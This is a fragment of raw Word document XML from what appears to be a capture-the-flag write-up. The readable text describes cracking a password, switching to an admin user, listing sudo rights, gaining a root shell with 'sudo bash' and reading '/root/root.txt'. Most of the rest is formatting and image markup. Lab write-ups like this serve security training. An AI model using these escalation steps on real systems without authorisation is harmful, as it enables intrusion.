          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to crack it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">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130300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="54"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obtaining the password in plaintext, we can switch to the admin user:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">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825500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55"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executing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we notice that we have the privilege to execute any command on the server with root privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">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Therefore, we can execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo bash </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nd retrieve the final flag </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /root/root.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1257300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67"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headerReference r:id="rId32" w:type="default"/>
      <w:headerReference r:id="rId33" w:type="first"/>
      <w:headerReference r:id="rId34" w:type="even"/>
      <w:footerReference r:id="rId35" w:type="default"/>
      <w:footerReference r:id="rId36" w:type="first"/>
      <w:footerReference r:id="rId37"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5">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="9"/>
    <w:bookmarkEnd w:id="9"/>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69" name="image7.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image7.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66">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67">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9.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7" name="image5.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image5.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Wallet</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28.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image28.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9.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21.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.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27.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.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3.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4.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.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 Id="rId2"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8.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z1JOYlOBpoy0q8ztAG9FWkB2A==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLjY3MDB1dHowcGI1djIOaC5ta2NjZ3A3MTJ2ZTgyDmgueTZjdWRkZWZoZnJ5Mg5oLjN5am4wb215MHRybzIOaC44MTB0dnptejE5ZjAyDmguMTc1ZjVjczk0ejBvOAByITF6Q2pTQXlrTWJVSWh1Ql9BMWFQal9QZHR6MFR5ckZ0Uw==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